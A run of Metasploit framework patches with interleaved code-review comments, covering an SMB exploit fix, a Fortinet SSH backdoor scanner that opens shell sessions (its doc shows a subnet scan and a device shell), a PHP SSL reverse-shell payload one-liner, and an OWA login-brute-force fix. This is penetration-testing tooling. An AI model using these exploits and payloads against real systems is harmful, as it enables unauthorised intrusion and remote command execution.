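Review bot: The new `rescue ::RubySMB::Error::NegotiationFailure` branch returns false without calling `report_failure`, while the sibling branch for connection errors extended in the same hunk does; if a negotiation failure after lsass has died is deliberately not recorded as a failure, say so in a comment there, otherwise add the `report_failure` call. The claim in its message that the target "may reboot in 60 seconds" is not something the code can observe; hedging it ("often reboots") keeps the message honest. The enclosing begin/rescue block starts outside the hunk.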
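Review bot: `'''` is not a comment in Ruby: together with the matching `'''` added in the `@@ -293,7 +303,7 @@` hunk it forms three adjacent string literals (`''`, the quoted block, `''`) that are evaluated and discarded in the class body, and the construct breaks the moment the quoted text gains an apostrophe. Since the extra delay is now supplied by the `'WfsDelay' => 5` default option, delete the `wfs_delay` override outright, or wrap it in `=begin`/`=end` if it must stay as a record.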
@@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay super + 5 end - + ''' def smb2_grooms(grooms, payload_hdr_pkt) grooms.times do |groom_id| @@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Sending malformed Trans2 packets") sock.put(trans2_pkt_nulled) - sock.get_once + begin + sock.get_once + rescue EOFError + vprint_error("No response back from SMB echo request. Continuing anyway...") + end client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00") end From 854ac67b8e96dcf9d1b83ee3083a0340a0801601 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 15:21:14 -0600 Subject: [PATCH 24/33] Use start_session in fortinet_backdoor Still get "Unknown admin user ''" from a shell channel request, @busterb's more complete implementation notwithstanding. Hoping we fix this in a subsequent commit or related PR. Please see #6612 and #9524. --- .../scanner/ssh/fortinet_backdoor.rb | 34 ++++++++++++++----- 1 file changed, 25 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index e06d3100f5..6e2ec3a374 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner + include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Report def initialize(info = {}) 
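Review bot: The message in the new rescue describes the wrong packet: the guarded `sock.get_once` follows `sock.put(trans2_pkt_nulled)`, and the echo request is only sent on the next line, so an EOFError here means the target closed the connection after the malformed Trans2 packets, not that an echo went unanswered. `vprint_error("Connection closed after the malformed Trans2 packets. Continuing anyway...")` matches what happened. The enclosing method starts and ends outside the hunk.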
@@ -63,15 +64,30 @@ class MetasploitModule < Msf::Auxiliary return end - if ssh - print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") - report_vuln( - host: ip, - name: self.name, - refs: self.references, - info: ssh.transport.server_version.version - ) - end + return unless ssh + + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + + version = ssh.transport.server_version.version + + report_vuln( + host: ip, + name: self.name, + refs: self.references, + info: version + ) + + shell = Net::SSH::CommandStream.new(ssh) + + return unless shell + + info = "Fortinet SSH Backdoor (#{version})" + + ds_merge = { + 'USERNAME' => 'Fortimanager_Access' + } + + start_session(self, info, ds_merge, false, shell.lsock) end def rport From a5d78b82d4651ad75160d3864a99160ef4c87be9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 15:51:53 -0600 Subject: [PATCH 25/33] Add require for Net::SSH::CommandStream --- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 6e2ec3a374..a07ad0243a 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,6 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +# XXX: This shouldn't be necessary but is now +require 'net/ssh/command_stream' + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::Fortinet From cc2495dd9ca208e87b8203d06aeddf2c51715d8e Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 17:00:43 -0600 Subject: [PATCH 26/33] Explain fortinet-backdoor -> FortinetBackdoor --- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 2 ++ 1 file changed, 2 insertions(+) 
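Review bot: `return unless shell` guards a value that `Net::SSH::CommandStream.new(ssh)` has just returned; unless that class overrides `self.new`, a constructor yields an instance and signals failure by raising, so the guard is dead and a failed channel open propagates as an exception after `report_vuln` has already recorded the host. If the intent is to survive that case, rescue the exception around the `CommandStream.new` call instead. The literal `'Fortimanager_Access'` now appears in both the `print_good` line and `ds_merge`; a single constant keeps the two from drifting. The enclosing method starts outside the hunk.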
diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index a07ad0243a..630b1a6f85 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -49,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary ssh_opts = { port: rport, + # The auth method is converted into a class name for instantiation, + # so fortinet-backdoor here becomes FortinetBackdoor from the mixin auth_methods: ['fortinet-backdoor'], non_interactive: true, config: false, From 3880f6a65e73204977ec41de2a8fbabedcf30972 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 20:05:02 -0600 Subject: [PATCH 27/33] Finally fix "Unknown admin user ''" after 2yrs The failed password auth was necessary after all. I misread the PoC. :'( Apparently the password auth sets the username, while the backdoored keyboard-interactive auth sets the password. --- lib/msf/core/exploit/fortinet.rb | 36 +++++++++++++------ .../scanner/ssh/fortinet_backdoor.rb | 3 ++ 2 files changed, 29 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb index 9b8aae1f9c..6072eccbff 100644 --- a/lib/msf/core/exploit/fortinet.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- +# https://www.ietf.org/rfc/rfc4252.txt # https://www.ietf.org/rfc/rfc4256.txt require 'net/ssh' 
@@ -11,21 +12,21 @@ module Msf::Exploit::Remote::Fortinet USERAUTH_INFO_RESPONSE = 61 def authenticate(service_name, username = 'Fortimanager_Access', password = nil) - debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' } send_message(userauth_request( =begin - string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) - string service name (US-ASCII) - string "keyboard-interactive" (US-ASCII) - string language tag (as defined in [RFC-3066]) - string submethods (ISO-10646 UTF-8) + string user name + string service name + string "password" + boolean FALSE + string plaintext password in ISO-10646 UTF-8 encoding [RFC3629] =end username, service_name, - 'keyboard-interactive', - '', - '' + 'password', + false, + password || '' )) loop do @@ -37,7 +38,22 @@ module Msf::Exploit::Remote::Fortinet return true when USERAUTH_FAILURE debug { 'Received SSH_MSG_USERAUTH_FAILURE' } - return false + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) when USERAUTH_INFO_REQUEST debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 630b1a6f85..70e83503f2 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -93,6 +93,9 @@ class MetasploitModule < Msf::Auxiliary } start_session(self, info, ds_merge, false, shell.lsock) + + # XXX: Ruby segfaults if we don't remove the SSH socket + remove_socket(ssh.transport.socket) end def rport 
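Review bot: The `when USERAUTH_FAILURE` branch in the second hunk no longer returns: every failure now sends a keyboard-interactive request and goes round `loop do` again, so a host that rejects the keyboard-interactive attempt too (a patched device, or any ordinary sshd the scanner reaches) has the module re-sending requests until the server drops the connection. Track the retry: `tried_kbdint = false` before `loop do` at the end of the first hunk, then `return false if tried_kbdint` at the top of the branch and `tried_kbdint = true` before its `send_message`. The ordering the commit message explains (password auth sets the username, the keyboard-interactive exchange sets the password) belongs in a comment above the first `send_message`, since nothing in the code otherwise says why a request expected to fail is sent first. The `authenticate` method starts in the first hunk and ends outside the second.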
From a9d6845f25c661d19b325d32fa45e667b910c547 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 21:49:00 -0600 Subject: [PATCH 28/33] Add module doc --- .../scanner/ssh/fortinet_backdoor.md | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md diff --git a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md new file mode 100644 index 0000000000..c1738306e8 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md 
@@ -0,0 +1,63 @@
+## Intro
+
+This module scans for the Fortinet SSH backdoor and creates sessions.
+
+## Setup
+
+1. `git clone https://github.com/nixawk/labs`
+2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
+3.
+
+## Usage
+
+```
+msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
+rhosts => 192.168.212.0/24
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
+threads => 100
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
+
+[*] Scanned 54 of 256 hosts (21% complete)
+[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
+[*] Scanned 65 of 256 hosts (25% complete)
+[*] Scanned 78 of 256 hosts (30% complete)
+[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
+[*] Scanned 104 of 256 hosts (40% complete)
+[*] Scanned 141 of 256 hosts (55% complete)
+[*] Scanned 154 of 256 hosts (60% complete)
+[*] Scanned 180 of 256 hosts (70% complete)
+[*] Scanned 205 of 256 hosts (80% complete)
+[*] Scanned 240 of 256 hosts (93% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
+[*] Starting interaction with 1...
+
+FortiGate-VM # get system status
+Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
+Virus-DB: 16.00560(2012-10-19 08:31)
+Extended DB: 1.00000(2012-10-17 15:46)
+Extreme DB: 1.00000(2012-10-17 15:47)
+IPS-DB: 4.00345(2013-05-23 00:39)
+IPS-ETDB: 0.00000(2000-00-00 00:00)
+Serial-Number: FGVM00UNLICENSED
+Botnet DB: 1.00000(2012-05-28 22:51)
+License Status: Evaluation license expired
+Evaluation License Expires: Thu Jan 28 13:05:41 2016
+BIOS version: 04000002
+Log hard disk: Need format
+Hostname: FortiGate-VM
+Operation Mode: NAT
+Current virtual domain: root
+Max number of virtual domains: 10
+Virtual domains status: 1 in NAT mode, 0 in TP mode
+Virtual domain configuration: disable
+FIPS-CC mode: disable
+Current HA mode: standalone
+Branch point: 228
+Release Version Information: GA Patch 4
+System time: Wed Feb 21 13:13:43 2018
+
+FortiGate-VM #
+```
From 3f88e59516fffa349c78951db2905fc3a1be9bee Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Wed, 21 Feb 2018 21:54:27 -0600
Subject: [PATCH 29/33] handle Python 3.5/3.6 differences so we always have a UTF-8 string

---
 lib/msf/core/modules/external/python/metasploit/module.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py
index 56b6781b23..6470effe0e 100644
--- a/lib/msf/core/modules/external/python/metasploit/module.py
+++ b/lib/msf/core/modules/external/python/metasploit/module.py
@@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts):
 
 
 def run(metadata, module_callback):
-    req = json.loads(os.read(0, 10000))
+    req = json.loads(os.read(0, 10000).decode("utf-8"))
     if req['method'] == 'describe':
         rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})
     elif req['method'] == 'run':
From 7e665ab2879ac1bb36f267dd18b29636275b28e5 Mon Sep 17 00:00:00 2001
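Review bot: `os.read(0, 10000)` is still a single read capped at 10000 bytes, so the added `.decode("utf-8")` runs on whatever that one read happens to return: a request larger than the cap or delivered across several pipe writes is truncated, and if the cut lands inside a multi-byte sequence the decode raises UnicodeDecodeError before `json.loads` ever sees the data. Reading the complete request before decoding avoids both, either `sys.stdin.buffer.read()` if the framework closes the pipe after writing one request, or accumulating `os.read` chunks until the message is complete; I can't see from this hunk how requests are framed, so which form fits depends on that. `run` continues past the end of the hunk.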
From: Brent Cook
Date: Wed, 21 Feb 2018 21:54:58 -0600
Subject: [PATCH 30/33] check for extra libraries explicitly, fail gracefully

---
 .../auxiliary/scanner/ssl/bleichenbacher_oracle.py | 14 +++++++++++---
 1 file changed, 11 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py
index 0dfa7558d9..4b5bab7f6b 100755
--- a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py
+++ b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py
@@ -9,9 +9,13 @@ import os
 import ssl
 
 # extra modules
-import gmpy2
-from cryptography import x509
-from cryptography.hazmat.backends import default_backend
+dependencies_missing = False
+try:
+    import gmpy2
+    from cryptography import x509
+    from cryptography.hazmat.backends import default_backend
+except ImportError:
+    dependencies_missing = True
 
 from metasploit import module
 
@@ -151,6 +155,10 @@ def oracle(target, pms, cke_2nd_prefix, cipher_handshake=ch_def, messageflow=Fal
 
 
 def run(args):
+    if dependencies_missing:
+        module.log("Module dependencies (gmpy2 and cryptography python libraries) missing, cannot continue", level='error')
+        return
+
     target = (args['rhost'], int(args['rport']))
     timeout = float(args['timeout'])
     cipher_handshake = cipher_handshakes[args['cipher_group']]
From 77b3673e382e204c187e8bf4a5a75b64b395a22a Mon Sep 17 00:00:00 2001
From: Trevor Sibanda
Date: Mon, 19 Feb 2018 15:49:46 +0200
Subject: [PATCH 31/33] Fix reverse_php_ssl infinite loop

---
 modules/payloads/singles/cmd/unix/reverse_php_ssl.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
index d4740e5e39..bd65a0861e 100644
--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
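Review bot: The bare `except ImportError:` in the first hunk discards the exception, so the message logged from `run` in the second hunk can only say that one of gmpy2 or cryptography is missing, not which one. Keeping it, e.g. `except ImportError as exc:` / `dependencies_missing = str(exc)`, and including it in the log text (`"Module dependency missing (%s), cannot continue" % dependencies_missing`) tells the operator what to install, while `dependencies_missing` stays falsy on the success path because it is still initialised to `False`. The module-level code between the two hunks is not visible here; if anything there touches `x509`, `default_backend` or `gmpy2` at import time the file still fails before `run` is reached, which the early return would not catch.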
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 132
+  CachedSize = 253
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -49,6 +49,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
   end
 end
From d737f77b84feca8dbc7ecb02b0ac7e6a75ca3d4b Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 22 Feb 2018 10:45:49 -0600
Subject: [PATCH 32/33] bump gems, lock ruby_smb for now

---
 Gemfile.lock                 | 26 +++++++++++++-------------
 metasploit-framework.gemspec |  2 +-
 2 files changed, 14 insertions(+), 14 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 4e5e66856a..0d502baa64 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -59,7 +59,7 @@ PATH
     rex-text
     rex-zip
     ruby-macho
-    ruby_smb
+    ruby_smb (= 0.0.18)
     rubyntlm
     rubyzip
     sqlite3
@@ -125,11 +125,11 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.13.1)
+    faraday (0.14.0)
       multipart-post (>= 1.2, < 3)
     filesize (0.1.1)
     fivemat (1.3.5)
-    google-protobuf (3.5.1)
+    google-protobuf (3.5.1.2)
     googleapis-common-protos-types (1.0.1)
       google-protobuf (~> 3.0)
     googleauth (0.6.2)
@@ -140,12 +140,12 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.8.3)
+    grpc (1.9.1)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
     hashery (2.1.2)
-    i18n (0.9.1)
+    i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
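Review bot: The rewritten `cmd` in the second hunk still interpolates `datastore['LHOST']` into the `ssl://` URL even though the three context lines directly above it compute a bracketed `lhost` for IPv6, so for an IPv6 LHOST the bracketing is thrown away and the host:port form passed to `stream_socket_client` is an unbracketed IPv6 literal followed by `:port`, which is ambiguous; the `ver` local on the line above is likewise never used. Use the prepared local instead: `ssl://#{lhost}:#{datastore['LPORT']}`. Since `CachedSize` in the first hunk is tied to the generated command length, it will need re-checking after any further change to the string.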
@@ -155,7 +155,7 @@ GEM
     logging (2.2.2)
       little-plugger (~> 1.1)
       multi_json (~> 1.10)
-    loofah (2.1.1)
+    loofah (2.2.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     memoist (0.16.0)
@@ -167,7 +167,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.12)
+    metasploit-credential (2.0.13)
       metasploit-concern
       metasploit-model
       metasploit_data_models
@@ -194,7 +194,7 @@ GEM
     metasploit_payloads-mettle (0.3.7)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.11.1)
+    minitest (5.11.3)
     mqtt (0.5.0)
     msgpack (1.2.2)
     multi_json (1.13.1)
@@ -203,7 +203,7 @@ GEM
     net-ssh (4.2.0)
     network_interface (0.0.2)
     nexpose (7.2.0)
-    nokogiri (1.8.1)
+    nokogiri (1.8.2)
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
@@ -214,7 +214,7 @@ GEM
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.12.4)
-    pdf-reader (2.0.0)
+    pdf-reader (2.1.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -229,7 +229,7 @@ GEM
     pry (0.11.3)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.0.1)
+    public_suffix (3.0.2)
     rack (1.6.8)
     rack-test (0.6.3)
       rack (>= 1.0)
@@ -320,7 +320,7 @@ GEM
       rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.7.1)
     ruby-macho (1.1.0)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
@@ -348,7 +348,7 @@ GEM
     thread_safe (0.3.6)
     timecop (0.9.1)
     ttfunk (1.5.1)
-    tzinfo (1.2.4)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
     tzinfo-data (1.2018.3)
       tzinfo (>= 1.0.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 6ab2274e03..4837f25845 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -127,7 +127,7 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'mqtt'
   spec.add_runtime_dependency 'net-ssh'
   spec.add_runtime_dependency 'bcrypt_pbkdf'
-  spec.add_runtime_dependency 'ruby_smb'
+  spec.add_runtime_dependency 'ruby_smb', '0.0.18'
 
   #
   # REX Libraries
From e531dbc976d107946c1c6885607bcad019e6c471 Mon Sep 17 00:00:00 2001
From: James Barnett
Date: Thu, 22 Feb 2018 11:25:35 -0600
Subject: [PATCH 33/33] Fix bug causing all logins to appear valid

The headers we were looking for were a little too loose and were incorrectly identifying all responses as successful login attempts
---
 modules/auxiliary/scanner/http/owa_login.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb
index aa41da8017..9c335006d4 100644
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -232,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary
           # No password change required moving on.
           # Check for valid login but no mailbox setup
           print_good("server type: #{res.headers["X-FEServer"]}")
-          if res.headers['location'] =~ /owa/
+          if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/
             print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
             report_cred(
               ip: res.peerinfo['addr'],
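Review bot: The new condition joins the two matches with `and`, which binds looser than `&&` and is the keyword form the Ruby style guide reserves for control flow; it happens to work here because both operands are complete `=~`/`!~` expressions, but the conventional and less surprising form is `if res.headers['location'] =~ /owa/ && res.headers['location'] !~ /reason/`. Both patterns are also unanchored substring matches on the Location header, so any redirect whose URL merely contains "owa" and lacks "reason" anywhere counts as a login; if the failure redirect is known to carry a `reason` query parameter, matching it explicitly (`!~ /[?&]reason=/`) makes the success check harder to regress in the way the commit message describes. The enclosing method starts and continues outside this hunk.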